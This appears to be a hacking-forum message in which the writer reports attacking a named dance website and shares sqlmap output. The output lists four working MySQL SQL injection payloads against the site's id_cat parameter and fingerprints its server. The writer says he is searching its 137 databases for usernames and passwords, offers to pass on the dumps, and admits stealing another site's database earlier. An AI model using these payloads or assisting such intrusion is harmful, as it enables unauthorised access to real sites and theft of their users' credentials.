for the danceparadise.... as i see in the picture you sent me they got a shitload of databases (137) to be exact... i cant pull anything from those tables and dump it since its so many kinds of sqli lol, but im running a search through them see if i find any user/pass stuff, since thats alot to go through manually...
search is gonna take a while since its so many tables, but ill PM you the dumps if you want when its done if i find anything...
sqlmap identified the following injection points with a total of 185 HTTP(s) requests:
Parameter: id_cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id_cat=3' AND 2235=2235 AND 'Uqvm'='Uqvm
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id_cat=3' AND (SELECT 2241 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(2241=2241,1))),0x7170766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nYun'='nYun
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id_cat=3';(SELECT * FROM (SELECT(SLEEP(5)))mlAW)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id_cat=3' AND (SELECT * FROM (SELECT(SLEEP(5)))yOWW) AND 'SQSG'='SQSG
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: MySQL 5.0
the other website dont seem to be vuln at least through sqlmap, maybe manually but i dont feel like going through all of that right now... were you able to get the tables like you did with danceparadise in hajiv for the other one? (c-on-text)
and what you mean by you added your mark in that other site ? wanna hear something funny i just noticed, i actually audited that site before and got their db dump too lol... like a few months back, never did anything with it though.. (angelvest one)
P.S this is all for informative purposes, im in no way damaging or defacing anything.. all for the LULZ.. lol